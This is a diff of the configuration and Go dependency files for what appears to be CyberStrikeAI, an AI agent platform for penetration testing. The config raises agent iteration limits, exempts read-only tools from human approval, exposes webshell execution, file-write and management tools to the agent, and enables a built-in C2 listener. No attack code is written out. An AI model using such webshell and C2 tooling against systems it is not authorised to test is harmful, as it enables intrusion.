max_total_tokens: 120000 # LLM 相关上下文的最大 Token 数限制(内存压缩和攻击链构建会共用此配置) max_total_tokens: 120000 # LLM 相关上下文的最大 Token 数限制(内存压缩和攻击链构建会共用此配置)
# Eino 路径模型推理:DeepSeek/OpenAI 为 thinking / reasoning_effort 等;provider 为 claude 时合并为 Anthropic 顶层 thinkingextended thinking),mode: off 关闭
reasoning:
mode: on # auto | on | offoff 时不附加任何推理扩展字段
effort: high # low | medium | high | max;空表示不指定(openai_compat 下 auto 且无强度时不发请求扩展)
allow_client_reasoning: true # false 时忽略对话请求体 reasoning,仅以下方为准
profile: openai_compat # auto | deepseek_compat | openai_compat | output_config_effort
# extra_request_fields: {} # 可选:管理员自定义根级 JSON 片段(高级)
# ============================================ # ============================================
# 信息收集(FOFA)配置(可选) # 信息收集(FOFA)配置(可选)
# ============================================ # ============================================
@@ -53,24 +77,26 @@ fofa:
# Agent 配置 # Agent 配置
# 达到最大迭代次数时,AI 会自动总结测试结果 # 达到最大迭代次数时,AI 会自动总结测试结果
agent: agent:
max_iterations: 120 # 最大迭代次数,AI 代理最多执行多少轮工具调用 max_iterations: 1200 # 最大迭代次数,AI 代理最多执行多少轮工具调用
large_result_threshold: 102400 # 大结果阈值(字节),默认50KB,超过此大小会自动保存到存储 large_result_threshold: 102400 # 大结果阈值(字节),默认50KB,超过此大小会自动保存到存储
result_storage_dir: tmp # 结果存储目录,大结果会保存在此目录下 result_storage_dir: tmp # 结果存储目录,大结果会保存在此目录下
tool_timeout_minutes: 30 # 单次工具执行最大时长(分钟),超时自动终止;0 表示不限制(不推荐,易出现长时间挂起) tool_timeout_minutes: 60 # 单次工具执行最大时长(分钟),超时自动终止;0 表示不限制(不推荐,易出现长时间挂起)
# system_prompt_path: prompts/single-react.md # 可选:单代理系统提示文件(相对本配置文件所在目录);非空且可读时替换内置提示 # system_prompt_path: prompts/single-react.md # 可选:单代理系统提示文件(相对本配置文件所在目录);非空且可读时替换内置提示
system_prompt_path: ""
# 人机协同(HITL)全局白名单:此处列出的工具始终免审批,与对话页「白名单工具(免审批,逗号分隔)」合并为并集;侧栏「应用」可合并写入本列表并立即生效。 # 人机协同(HITL)全局白名单:此处列出的工具始终免审批,与对话页「白名单工具(免审批,逗号分隔)」合并为并集;侧栏「应用」可合并写入本列表并立即生效。
hitl: hitl:
# 按你环境里的真实工具名增删(与侧栏一致、小写不敏感);不需要全局免审批可改为 [] # 按你环境里的真实工具名增删(与侧栏一致、小写不敏感);不需要全局免审批可改为 []
tool_whitelist: [read_file, list_dir, glob, grep] tool_whitelist: [read_file, list_dir, glob, grep]
# 多代理(CloudWeGo Eino DeepAgent,与上方单 Agent /api/agent-loop 并存) # 多代理(CloudWeGo Eino DeepAgent,与上方单 Agent /api/agent-loop 并存)
# 依赖在 go.mod 中拉取;若下载失败可设置: go env -w GOPROXY=https://goproxy.cn,direct # 依赖在 go.mod 中拉取;若下载失败可设置: go env -w GOPROXY=https://goproxy.cn,direct
# 启用后需重启服务才会注册 /api/multi-agent 与 /api/multi-agent/streamDeep / Plan-Execute / Supervisor 由对话页与 WebShell 所选模式在请求体中传入;机器人/批量无请求体时固定按 deep # 启用后需重启服务才会注册 /api/multi-agent 与 /api/multi-agent/streamDeep / Plan-Execute / Supervisor 由对话页与 WebShell 所选模式在请求体中传入;机器人按 robot_default_agent_mode
multi_agent: multi_agent:
enabled: true enabled: true
robot_use_multi_agent: true # true 时企业微信/钉钉/飞书机器人也走 Eino 多代理(成本更高) robot_default_agent_mode: eino_single # 企微/钉钉/飞书机器人默认对话模式:react | eino_single | deep | plan_execute | supervisor
batch_use_multi_agent: false # true 时「批量任务」队列中每个子任务也走 Eino 多代理(成本更高) batch_use_multi_agent: false # true 时「批量任务」队列中每个子任务也走 Eino 多代理(成本更高)
max_iteration: 0 # 主代理 / plan_execute 执行器最大轮次,0 表示沿用 agent.max_iterations max_iteration: 0 # 主代理 / plan_execute 执行器最大轮次,0 表示沿用 agent.max_iterations
# plan_execute 专用:execute↔replan 外层循环上限,0 表示 Eino 默认 10。Executor 未暴露 Handlerspatch/reduction/plantask 不作用于 PE,但 tool_search 工具列表拆分仍通过共享 ToolsConfig 作用于执行器 # plan_execute 专用:execute↔replan 外层循环上限,0 表示 Eino 默认 10。当前实现下 Executor 会挂载 patch/reduction/tool_search 等前置中间件
plan_execute_loop_max_iterations: 0 plan_execute_loop_max_iterations: 0
sub_agent_max_iterations: 120 sub_agent_max_iterations: 120
sub_agent_user_context_max_runes: 0 # 子代理 task 描述中自动注入用户原始请求的字符上限;0=默认2000,负数=禁用 sub_agent_user_context_max_runes: 0 # 子代理 task 描述中自动注入用户原始请求的字符上限;0=默认2000,负数=禁用
@@ -87,19 +113,44 @@ multi_agent:
# Eino ADK 中间件与 Deep/Supervisor 调参(结构体见 internal/config/config.go → MultiAgentEinoMiddlewareConfig # Eino ADK 中间件与 Deep/Supervisor 调参(结构体见 internal/config/config.go → MultiAgentEinoMiddlewareConfig
eino_middleware: eino_middleware:
patch_tool_calls: true # true:修补历史中无 tool_result 的悬空 tool_call(流式中断/重试后更稳);false:关闭;字段省略时默认等同 true patch_tool_calls: true # true:修补历史中无 tool_result 的悬空 tool_call(流式中断/重试后更稳);false:关闭;字段省略时默认等同 true
tool_search_enable: false # true:工具数 ≥ min 时启用 tool_search,仅前 N 个工具常驻,其余按正则按需解锁,省 token、减误选;false:全量工具进上下文 tool_search_enable: true # true:工具数 ≥ min 时启用 tool_search,仅前 N 个工具常驻,其余按正则按需解锁,省 token、减误选;false:全量工具进上下文
tool_search_min_tools: 20 # 达到该数量才启用 tool_search(避免工具很少时多此一举);与 always_visible 配合使用 tool_search_min_tools: 20 # 达到该数量才启用 tool_search(避免工具很少时多此一举);与 always_visible 配合使用
tool_search_always_visible: 12 # 始终直接暴露给模型的工具个数(顺序与角色工具列表一致);其余工具进入动态池,需 tool_search 解锁 tool_search_always_visible: 12 # 始终直接暴露给模型的工具个数(顺序与角色工具列表一致);其余工具进入动态池,需 tool_search 解锁
tool_search_always_visible_tools: [read_file, glob, grep, write_file, edit_file, execute, task, transfer_to_agent, exit, write_todos, skill, tool_search, TaskCreate, TaskGet, TaskUpdate, TaskList, record_vulnerability, list_knowledge_risk_types, search_knowledge_base, webshell_exec, webshell_file_list, webshell_file_read, webshell_file_write, manage_webshell_list, manage_webshell_add, manage_webshell_update, manage_webshell_delete, manage_webshell_test, batch_task_list, batch_task_get, batch_task_start, batch_task_rerun, batch_task_pause, batch_task_update_metadata, batch_task_update_schedule, batch_task_schedule_enabled, batch_task_update_task, batch_task_remove_task, batch_task_delete, batch_task_create, batch_task_add_task, http-framework-test] # 后端内置常驻工具白名单(优先于 always_visible 数量策略)
plantask_enable: false # true:主代理(Deep / Supervisor 主)挂载 TaskCreate/Get/Update/List;需 eino_skills 可用且 skills_dir 存在,否则仅打日志并跳过 plantask_enable: false # true:主代理(Deep / Supervisor 主)挂载 TaskCreate/Get/Update/List;需 eino_skills 可用且 skills_dir 存在,否则仅打日志并跳过
plantask_rel_dir: .eino/plantask # 结构化任务文件相对 skills_dir 的子目录,其下再按会话 ID 分子目录存放 plantask_rel_dir: .eino/plantask # 结构化任务文件相对 skills_dir 的子目录,其下再按会话 ID 分子目录存放
reduction_enable: false # true:大工具输出截断/落盘以控上下文;依赖与 plantask 相同的 eino local 写盘后端,无后端时不挂载 reduction_enable: true # true:大工具输出截断/落盘以控上下文;依赖与 plantask 相同的 eino local 写盘后端,无后端时不挂载
reduction_max_length_for_trunc: 50000 # 单条工具结果超过该字符数(bytes)时截断并落盘(由 reduction 中间件处理)
reduction_max_tokens_for_clear: 160000 # 历史工具结果清理阈值(tokens),超阈值时在模型调用前清理旧结果
reduction_root_dir: "" # 非空:截断/清理内容落盘根路径;空:使用系统临时目录下按会话隔离的默认路径 reduction_root_dir: "" # 非空:截断/清理内容落盘根路径;空:使用系统临时目录下按会话隔离的默认路径
reduction_clear_exclude: [] # 不参与「清理阶段」的工具名额外列表(会与 task/transfer/exit 等内置排除项合并);需要时用 YAML 列表填写 reduction_clear_exclude: [] # 不参与「清理阶段」的工具名额外列表(会与 task/transfer/exit 等内置排除项合并);需要时用 YAML 列表填写
reduction_sub_agents: false # true:子代理也挂 reductionfalse:仅编排主代理使用 reduction reduction_sub_agents: true # true:子代理也挂 reductionfalse:仅编排主代理使用 reduction
summarization_trigger_ratio: 0.8 # summarization 触发比例(max_total_tokens * ratio),建议 0.75~0.85
summarization_emit_internal_events: true # true:发出 summarization 内部事件(便于诊断)
history_input_budget_ratio: 0.35 # 历史入队预算比例(max_total_tokens * ratio
plan_execute_user_input_budget_ratio: 0.35 # plan_execute 中 userInput 预算比例(planner/replanner/executor 共用)
plan_execute_executed_steps_budget_ratio: 0.2 # plan_execute 中 executed_steps 预算比例
plan_execute_max_step_result_runes: 4000 # plan_execute 每步结果最大字符数(超出截断)
plan_execute_keep_last_steps: 8 # plan_execute 仅保留最近 N 步正文,早期步骤折叠为标题
checkpoint_dir: "" # 非空:为 adk.NewRunner 启用按会话子目录的文件型 CheckPointStore,便于中断恢复持久化;Resume 的 HTTP/前端流程需另行对接 checkpoint_dir: "" # 非空:为 adk.NewRunner 启用按会话子目录的文件型 CheckPointStore,便于中断恢复持久化;Resume 的 HTTP/前端流程需另行对接
deep_output_key: "" # 非空:将最终助手输出写入 adk session 的键名(Deep 与 Supervisor 主代理);空表示不写入 deep_output_key: "" # 非空:将最终助手输出写入 adk session 的键名(Deep 与 Supervisor 主代理);空表示不写入
deep_model_retry_max_retries: 0 # >0ChatModel 调用失败时的框架级最大重试次数(Deep 与 Supervisor 主);0:不重试 deep_model_retry_max_retries: 0 # >0ChatModel 调用失败时的框架级最大重试次数(Deep 与 Supervisor 主);0:不重试
task_tool_description_prefix: "" # 非空:仅 Deep 的 task 工具使用自定义描述前缀,运行时会拼接子代理名称;空则走 Eino 默认生成逻辑 task_tool_description_prefix: "" # 非空:仅 Deep 的 task 工具使用自定义描述前缀,运行时会拼接子代理名称;空则走 Eino 默认生成逻辑
# Eino callbacks + OpenTelemetry:框架级 span(与 Zap 对齐);默认不向终端用户 UI 推 eino_trace_*(见 sse_trace_to_client
eino_callbacks:
enabled: true
# log_only=仅 Zap+OTel(推荐默认)| sse/full=才启用流式回调副本关闭等(full 含 stream hooks
mode: log_only
sse_trace_to_client: false # true:且 mode 为 sse/full 时,向前端时间线推送 eino_trace_*(排障/内网演示用)
max_input_summary_runes: 400
max_output_summary_runes: 400
zap_verbose: false # trueDebug 附带 input/output 摘要
otel:
enabled: true
service_name: cyberstrike-ai
exporter: stdout # none | stdout(开发/本机)| otlphttp(生产接 Collector
otlp_endpoint: localhost:4318 # otlphttp 时使用,host:port,路径固定 /v1/traces
sample_ratio: 1.0 # 0~1ParentBased+TraceIDRatio
# 数据库配置 # 数据库配置
database: database:
path: data/conversations.db # SQLite 数据库文件路径,用于存储对话历史和消息 path: data/conversations.db # SQLite 数据库文件路径,用于存储对话历史和消息
@@ -137,6 +188,9 @@ mcp:
# 外部 MCP 配置 # 外部 MCP 配置
external_mcp: external_mcp:
servers: {} servers: {}
# 内置 C2:本机仅做对话/知识库时可设为 false,不启动监听器、不注册 C2 MCP 工具;省略本段时默认启用
c2:
enabled: true
# ============================================ # ============================================
# 知识库相关配置 # 知识库相关配置
# ============================================ # ============================================
@@ -189,6 +243,14 @@ knowledge:
# 用于在手机端通过企业微信/钉钉/飞书与 CyberStrikeAI 对话,无需部署在服务器上也可使用 # 用于在手机端通过企业微信/钉钉/飞书与 CyberStrikeAI 对话,无需部署在服务器上也可使用
# 在系统设置 -> 机器人设置 中可配置 # 在系统设置 -> 机器人设置 中可配置
robots: robots:
wechat: # 微信 iLink(个人微信 ClawBot,扫码绑定)
enabled: false
bot_token: ""
ilink_bot_id: ""
ilink_user_id: ""
base_url: https://ilinkai.weixin.qq.com
bot_type: "3"
bot_agent: CyberStrikeAI/1.0
wecom: # 企业微信 wecom: # 企业微信
enabled: false enabled: false
token: "" token: ""
@@ -200,11 +262,13 @@ robots:
enabled: false enabled: false
client_id: "" client_id: ""
client_secret: "" client_secret: ""
allow_conversation_id_fallback: false
lark: # 飞书 lark: # 飞书
enabled: false enabled: false
app_id: "" app_id: ""
app_secret: "" app_secret: ""
verify_token: "" verify_token: ""
allow_chat_id_fallback: false
# ============================================ # ============================================
# Skills 相关配置 # Skills 相关配置
# ============================================ # ============================================
+27 -10
View File
@@ -9,13 +9,13 @@ toolchain go1.24.4
require ( require (
github.com/bytedance/sonic v1.15.0 github.com/bytedance/sonic v1.15.0
github.com/cloudwego/eino v0.8.8 github.com/cloudwego/eino v0.8.13
github.com/cloudwego/eino-ext/adk/backend/local v0.0.0-20260416081055-0ebab92e14f2 github.com/cloudwego/eino-ext/adk/backend/local v0.0.0-20260416081055-0ebab92e14f2
github.com/cloudwego/eino-ext/components/document/loader/file v0.0.0-20260416081055-0ebab92e14f2 github.com/cloudwego/eino-ext/components/document/loader/file v0.0.0-20260427010451-749e3706378b
github.com/cloudwego/eino-ext/components/document/transformer/splitter/markdown v0.0.0-20260416081055-0ebab92e14f2 github.com/cloudwego/eino-ext/components/document/transformer/splitter/markdown v0.0.0-20260427010451-749e3706378b
github.com/cloudwego/eino-ext/components/document/transformer/splitter/recursive v0.0.0-20260416081055-0ebab92e14f2 github.com/cloudwego/eino-ext/components/document/transformer/splitter/recursive v0.0.0-20260427010451-749e3706378b
github.com/cloudwego/eino-ext/components/embedding/openai v0.0.0-20260416081055-0ebab92e14f2 github.com/cloudwego/eino-ext/components/embedding/openai v0.0.0-20260427010451-749e3706378b
github.com/cloudwego/eino-ext/components/model/openai v0.1.12 github.com/cloudwego/eino-ext/components/model/openai v0.1.13
github.com/creack/pty v1.1.24 github.com/creack/pty v1.1.24
github.com/eino-contrib/jsonschema v1.0.3 github.com/eino-contrib/jsonschema v1.0.3
github.com/gin-gonic/gin v1.9.1 github.com/gin-gonic/gin v1.9.1
@@ -27,7 +27,14 @@ require (
github.com/open-dingtalk/dingtalk-stream-sdk-go v0.9.1 github.com/open-dingtalk/dingtalk-stream-sdk-go v0.9.1
github.com/pkoukk/tiktoken-go v0.1.8 github.com/pkoukk/tiktoken-go v0.1.8
github.com/robfig/cron/v3 v3.0.1 github.com/robfig/cron/v3 v3.0.1
go.opentelemetry.io/otel v1.34.0
go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp v1.34.0
go.opentelemetry.io/otel/exporters/stdout/stdouttrace v1.34.0
go.opentelemetry.io/otel/sdk v1.34.0
go.opentelemetry.io/otel/trace v1.34.0
go.uber.org/zap v1.26.0 go.uber.org/zap v1.26.0
golang.org/x/net v0.35.0
golang.org/x/text v0.26.0
golang.org/x/time v0.14.0 golang.org/x/time v0.14.0
gopkg.in/yaml.v3 v3.0.1 gopkg.in/yaml.v3 v3.0.1
) )
@@ -38,13 +45,16 @@ require (
github.com/buger/jsonparser v1.1.1 // indirect github.com/buger/jsonparser v1.1.1 // indirect
github.com/bytedance/gopkg v0.1.3 // indirect github.com/bytedance/gopkg v0.1.3 // indirect
github.com/bytedance/sonic/loader v0.5.0 // indirect github.com/bytedance/sonic/loader v0.5.0 // indirect
github.com/cenkalti/backoff/v4 v4.3.0 // indirect
github.com/cloudwego/base64x v0.1.6 // indirect github.com/cloudwego/base64x v0.1.6 // indirect
github.com/cloudwego/eino-ext/libs/acl/openai v0.1.16 // indirect github.com/cloudwego/eino-ext/libs/acl/openai v0.1.17 // indirect
github.com/dlclark/regexp2 v1.10.0 // indirect github.com/dlclark/regexp2 v1.10.0 // indirect
github.com/dustin/go-humanize v1.0.1 // indirect github.com/dustin/go-humanize v1.0.1 // indirect
github.com/evanphx/json-patch v0.5.2 // indirect github.com/evanphx/json-patch v0.5.2 // indirect
github.com/gabriel-vasile/mimetype v1.4.2 // indirect github.com/gabriel-vasile/mimetype v1.4.2 // indirect
github.com/gin-contrib/sse v0.1.0 // indirect github.com/gin-contrib/sse v0.1.0 // indirect
github.com/go-logr/logr v1.4.2 // indirect
github.com/go-logr/stdr v1.2.2 // indirect
github.com/go-playground/locales v0.14.1 // indirect github.com/go-playground/locales v0.14.1 // indirect
github.com/go-playground/universal-translator v0.18.1 // indirect github.com/go-playground/universal-translator v0.18.1 // indirect
github.com/go-playground/validator/v10 v10.14.0 // indirect github.com/go-playground/validator/v10 v10.14.0 // indirect
@@ -52,6 +62,7 @@ require (
github.com/gogo/protobuf v1.3.2 // indirect github.com/gogo/protobuf v1.3.2 // indirect
github.com/google/jsonschema-go v0.3.0 // indirect github.com/google/jsonschema-go v0.3.0 // indirect
github.com/goph/emperror v0.17.2 // indirect github.com/goph/emperror v0.17.2 // indirect
github.com/grpc-ecosystem/grpc-gateway/v2 v2.25.1 // indirect
github.com/json-iterator/go v1.1.12 // indirect github.com/json-iterator/go v1.1.12 // indirect
github.com/klauspost/cpuid/v2 v2.2.10 // indirect github.com/klauspost/cpuid/v2 v2.2.10 // indirect
github.com/leodido/go-urn v1.2.4 // indirect github.com/leodido/go-urn v1.2.4 // indirect
@@ -64,21 +75,27 @@ require (
github.com/pelletier/go-toml/v2 v2.2.3 // indirect github.com/pelletier/go-toml/v2 v2.2.3 // indirect
github.com/pkg/errors v0.9.1 // indirect github.com/pkg/errors v0.9.1 // indirect
github.com/sirupsen/logrus v1.9.3 // indirect github.com/sirupsen/logrus v1.9.3 // indirect
github.com/skip2/go-qrcode v0.0.0-20200617195104-da1b6568686e // indirect
github.com/slongfield/pyfmt v0.0.0-20220222012616-ea85ff4c361f // indirect github.com/slongfield/pyfmt v0.0.0-20220222012616-ea85ff4c361f // indirect
github.com/twitchyliquid64/golang-asm v0.15.1 // indirect github.com/twitchyliquid64/golang-asm v0.15.1 // indirect
github.com/ugorji/go/codec v1.2.11 // indirect github.com/ugorji/go/codec v1.2.11 // indirect
github.com/wk8/go-ordered-map/v2 v2.1.8 // indirect github.com/wk8/go-ordered-map/v2 v2.1.8 // indirect
github.com/yargevad/filepathx v1.0.0 // indirect github.com/yargevad/filepathx v1.0.0 // indirect
github.com/yosida95/uritemplate/v3 v3.0.2 // indirect github.com/yosida95/uritemplate/v3 v3.0.2 // indirect
go.opentelemetry.io/auto/sdk v1.1.0 // indirect
go.opentelemetry.io/otel/exporters/otlp/otlptrace v1.34.0 // indirect
go.opentelemetry.io/otel/metric v1.34.0 // indirect
go.opentelemetry.io/proto/otlp v1.5.0 // indirect
go.uber.org/multierr v1.11.0 // indirect go.uber.org/multierr v1.11.0 // indirect
golang.org/x/arch v0.15.0 // indirect golang.org/x/arch v0.15.0 // indirect
golang.org/x/crypto v0.39.0 // indirect golang.org/x/crypto v0.39.0 // indirect
golang.org/x/exp v0.0.0-20250305212735-054e65f0b394 // indirect golang.org/x/exp v0.0.0-20250305212735-054e65f0b394 // indirect
golang.org/x/net v0.24.0 // indirect
golang.org/x/oauth2 v0.30.0 // indirect golang.org/x/oauth2 v0.30.0 // indirect
golang.org/x/sys v0.33.0 // indirect golang.org/x/sys v0.33.0 // indirect
golang.org/x/text v0.26.0 // indirect google.golang.org/genproto/googleapis/api v0.0.0-20250115164207-1a7da9e5054f // indirect
google.golang.org/protobuf v1.30.0 // indirect google.golang.org/genproto/googleapis/rpc v0.0.0-20250115164207-1a7da9e5054f // indirect
google.golang.org/grpc v1.69.4 // indirect
google.golang.org/protobuf v1.36.3 // indirect
) )
// 修复钉钉 Stream SDK 在长连接断开(熄屏/网络中断)后 "panic: send on closed channel" 问题 // 修复钉钉 Stream SDK 在长连接断开(熄屏/网络中断)后 "panic: send on closed channel" 问题
+57 -21
View File
@@ -17,25 +17,27 @@ github.com/bytedance/sonic v1.15.0 h1:/PXeWFaR5ElNcVE84U0dOHjiMHQOwNIx3K4ymzh/uS
github.com/bytedance/sonic v1.15.0/go.mod h1:tFkWrPz0/CUCLEF4ri4UkHekCIcdnkqXw9VduqpJh0k= github.com/bytedance/sonic v1.15.0/go.mod h1:tFkWrPz0/CUCLEF4ri4UkHekCIcdnkqXw9VduqpJh0k=
github.com/bytedance/sonic/loader v0.5.0 h1:gXH3KVnatgY7loH5/TkeVyXPfESoqSBSBEiDd5VjlgE= github.com/bytedance/sonic/loader v0.5.0 h1:gXH3KVnatgY7loH5/TkeVyXPfESoqSBSBEiDd5VjlgE=
github.com/bytedance/sonic/loader v0.5.0/go.mod h1:AR4NYCk5DdzZizZ5djGqQ92eEhCCcdf5x77udYiSJRo= github.com/bytedance/sonic/loader v0.5.0/go.mod h1:AR4NYCk5DdzZizZ5djGqQ92eEhCCcdf5x77udYiSJRo=
github.com/cenkalti/backoff/v4 v4.3.0 h1:MyRJ/UdXutAwSAT+s3wNd7MfTIcy71VQueUuFK343L8=
github.com/cenkalti/backoff/v4 v4.3.0/go.mod h1:Y3VNntkOUPxTVeUxJ/G5vcM//AlwfmyYozVcomhLiZE=
github.com/certifi/gocertifi v0.0.0-20190105021004-abcd57078448/go.mod h1:GJKEexRPVJrBSOjoqN5VNOIKJ5Q3RViH6eu3puDRwx4= github.com/certifi/gocertifi v0.0.0-20190105021004-abcd57078448/go.mod h1:GJKEexRPVJrBSOjoqN5VNOIKJ5Q3RViH6eu3puDRwx4=
github.com/cloudwego/base64x v0.1.6 h1:t11wG9AECkCDk5fMSoxmufanudBtJ+/HemLstXDLI2M= github.com/cloudwego/base64x v0.1.6 h1:t11wG9AECkCDk5fMSoxmufanudBtJ+/HemLstXDLI2M=
github.com/cloudwego/base64x v0.1.6/go.mod h1:OFcloc187FXDaYHvrNIjxSe8ncn0OOM8gEHfghB2IPU= github.com/cloudwego/base64x v0.1.6/go.mod h1:OFcloc187FXDaYHvrNIjxSe8ncn0OOM8gEHfghB2IPU=
github.com/cloudwego/eino v0.8.8 h1:64NuheQBmxOXe/28Tm85rkBkxXMB5ZhjSu/j0RDFyZU= github.com/cloudwego/eino v0.8.13 h1:z5dhaZNN8TWZbP/lgKxGmF26Ii8fPeUlQCGV/NTtms0=
github.com/cloudwego/eino v0.8.8/go.mod h1:+2N4nsMPxA6kGBHpH+75JuTfEcGprAMTdsZESrShKpU= github.com/cloudwego/eino v0.8.13/go.mod h1:+2N4nsMPxA6kGBHpH+75JuTfEcGprAMTdsZESrShKpU=
github.com/cloudwego/eino-ext/adk/backend/local v0.0.0-20260416081055-0ebab92e14f2 h1:v2w9TyLAmNsMWo8NwntCc76uvNf6isTFkHB+oZZ8NqI= github.com/cloudwego/eino-ext/adk/backend/local v0.0.0-20260416081055-0ebab92e14f2 h1:v2w9TyLAmNsMWo8NwntCc76uvNf6isTFkHB+oZZ8NqI=
github.com/cloudwego/eino-ext/adk/backend/local v0.0.0-20260416081055-0ebab92e14f2/go.mod h1:os5Tq5FuSoz/MLqAdZER3ip49Oef9prc0kVsKsPYO48= github.com/cloudwego/eino-ext/adk/backend/local v0.0.0-20260416081055-0ebab92e14f2/go.mod h1:os5Tq5FuSoz/MLqAdZER3ip49Oef9prc0kVsKsPYO48=
github.com/cloudwego/eino-ext/components/document/loader/file v0.0.0-20260416081055-0ebab92e14f2 h1:H5Ohr3OWSjiTOe7y9pOPyVCKCNjAVj9YMaWmvZNTYPg= github.com/cloudwego/eino-ext/components/document/loader/file v0.0.0-20260427010451-749e3706378b h1:GIOC/VnXuSQx79mnQ3HgMvECjtyqvpJipmSUTFFfVsc=
github.com/cloudwego/eino-ext/components/document/loader/file v0.0.0-20260416081055-0ebab92e14f2/go.mod h1:HnxTQxmhuev6zaBl92EHUy/vEDWCuoE/OE4cTiF5JCg= github.com/cloudwego/eino-ext/components/document/loader/file v0.0.0-20260427010451-749e3706378b/go.mod h1:HnxTQxmhuev6zaBl92EHUy/vEDWCuoE/OE4cTiF5JCg=
github.com/cloudwego/eino-ext/components/document/transformer/splitter/markdown v0.0.0-20260416081055-0ebab92e14f2 h1:PRli0CmPfgUhwMGWGEAwg8nxde8hInC2OWv0vcIuwMk= github.com/cloudwego/eino-ext/components/document/transformer/splitter/markdown v0.0.0-20260427010451-749e3706378b h1:3owjV4nv+XRplavTeqFlCeAV4v7EHR2tIXDqLEmPc38=
github.com/cloudwego/eino-ext/components/document/transformer/splitter/markdown v0.0.0-20260416081055-0ebab92e14f2/go.mod h1:KVOVct4e2BQ7epDONW2QE1qU5+ccoh91FzJTs9vIJj0= github.com/cloudwego/eino-ext/components/document/transformer/splitter/markdown v0.0.0-20260427010451-749e3706378b/go.mod h1:KVOVct4e2BQ7epDONW2QE1qU5+ccoh91FzJTs9vIJj0=
github.com/cloudwego/eino-ext/components/document/transformer/splitter/recursive v0.0.0-20260416081055-0ebab92e14f2 h1:8sOFcDf9MtMVDQyozZtuhrmt+mLQRHEaf6dYC20Vxhs= github.com/cloudwego/eino-ext/components/document/transformer/splitter/recursive v0.0.0-20260427010451-749e3706378b h1:j8sj/5QiooV3LWphFDsJvyD/csWwupz+UKXeG+nqiNg=
github.com/cloudwego/eino-ext/components/document/transformer/splitter/recursive v0.0.0-20260416081055-0ebab92e14f2/go.mod h1:9R0RQrQSpg1JaNnRtw7+RfRAAv0HgdE348YnrlZ6coo= github.com/cloudwego/eino-ext/components/document/transformer/splitter/recursive v0.0.0-20260427010451-749e3706378b/go.mod h1:9R0RQrQSpg1JaNnRtw7+RfRAAv0HgdE348YnrlZ6coo=
github.com/cloudwego/eino-ext/components/embedding/openai v0.0.0-20260416081055-0ebab92e14f2 h1:OzKPBfGCJhjbtO+WfIMNSSnXxsj6/hUiyYOTaG2LUf4= github.com/cloudwego/eino-ext/components/embedding/openai v0.0.0-20260427010451-749e3706378b h1:pOqupZQyc46rw2Z0HeybtTmSMTwqfTrbRuGDuDsNf2A=
github.com/cloudwego/eino-ext/components/embedding/openai v0.0.0-20260416081055-0ebab92e14f2/go.mod h1:zyPrZT2bO6LyRJgVksQowR18jVgyLSvqK93hnO53/Lc= github.com/cloudwego/eino-ext/components/embedding/openai v0.0.0-20260427010451-749e3706378b/go.mod h1:zyPrZT2bO6LyRJgVksQowR18jVgyLSvqK93hnO53/Lc=
github.com/cloudwego/eino-ext/components/model/openai v0.1.12 h1:vcwNXeT7bpaXMNwUhtcHZwMYY8II2jAihuooyivmEZ0= github.com/cloudwego/eino-ext/components/model/openai v0.1.13 h1:5XHRTiTD5bt9KQrMHcfvuWNklEC3tpm3XHejdozt9vM=
github.com/cloudwego/eino-ext/components/model/openai v0.1.12/go.mod h1:ve/+/hLZMvxD5AieQ355xHIFhAZVlsG4rdwTnE16aQU= github.com/cloudwego/eino-ext/components/model/openai v0.1.13/go.mod h1:mgIoqYYOc0eECCqvLbEYpOJrQNTNxkwXzSJzFU+v5sQ=
github.com/cloudwego/eino-ext/libs/acl/openai v0.1.16 h1:q242n5P5Tx3a2QLaBmkfEpfRs/o17Ac6u3EAgItEEOc= github.com/cloudwego/eino-ext/libs/acl/openai v0.1.17 h1:EeVcR1TslRA2IdNW1h/2LaGbPlffwGhQm99jM3zWZiI=
github.com/cloudwego/eino-ext/libs/acl/openai v0.1.16/go.mod h1:p+l0zBB0GjjX8HTlbTs3g3KfUFwZC11bsCGZOXW/3L0= github.com/cloudwego/eino-ext/libs/acl/openai v0.1.17/go.mod h1:Zkcx6DPTR2NfWmtSXbhItswGw6hqUezNPhNcke0pOG8=
github.com/creack/pty v1.1.24 h1:bJrF4RRfyJnbTJqzRLHzcGaZK1NeM5kTC9jGgovnR1s= github.com/creack/pty v1.1.24 h1:bJrF4RRfyJnbTJqzRLHzcGaZK1NeM5kTC9jGgovnR1s=
github.com/creack/pty v1.1.24/go.mod h1:08sCNb52WyoAwi2QDyzUCTgcvVFhUzewun7wtTfvcwE= github.com/creack/pty v1.1.24/go.mod h1:08sCNb52WyoAwi2QDyzUCTgcvVFhUzewun7wtTfvcwE=
github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
@@ -59,6 +61,11 @@ github.com/gin-gonic/gin v1.9.1 h1:4idEAncQnU5cB7BeOkPtxjfCSye0AAm1R0RVIqJ+Jmg=
github.com/gin-gonic/gin v1.9.1/go.mod h1:hPrL7YrpYKXt5YId3A/Tnip5kqbEAP+KLuI3SUcPTeU= github.com/gin-gonic/gin v1.9.1/go.mod h1:hPrL7YrpYKXt5YId3A/Tnip5kqbEAP+KLuI3SUcPTeU=
github.com/go-check/check v0.0.0-20180628173108-788fd7840127 h1:0gkP6mzaMqkmpcJYCFOLkIBwI7xFExG03bbkOkCvUPI= github.com/go-check/check v0.0.0-20180628173108-788fd7840127 h1:0gkP6mzaMqkmpcJYCFOLkIBwI7xFExG03bbkOkCvUPI=
github.com/go-check/check v0.0.0-20180628173108-788fd7840127/go.mod h1:9ES+weclKsC9YodN5RgxqK/VD9HM9JsCSh7rNhMZE98= github.com/go-check/check v0.0.0-20180628173108-788fd7840127/go.mod h1:9ES+weclKsC9YodN5RgxqK/VD9HM9JsCSh7rNhMZE98=
github.com/go-logr/logr v1.2.2/go.mod h1:jdQByPbusPIv2/zmleS9BjJVeZ6kBagPoEUsqbVz/1A=
github.com/go-logr/logr v1.4.2 h1:6pFjapn8bFcIbiKo3XT4j/BhANplGihG6tvd+8rYgrY=
github.com/go-logr/logr v1.4.2/go.mod h1:9T104GzyrTigFIr8wt5mBrctHMim0Nb2HLGrmQ40KvY=
github.com/go-logr/stdr v1.2.2 h1:hSWxHoqTgW2S2qGc0LTAI563KZ5YKYRhT3MFKZMbjag=
github.com/go-logr/stdr v1.2.2/go.mod h1:mMo/vtBO5dYbehREoey6XUKy/eSumjCCveDpRre4VKE=
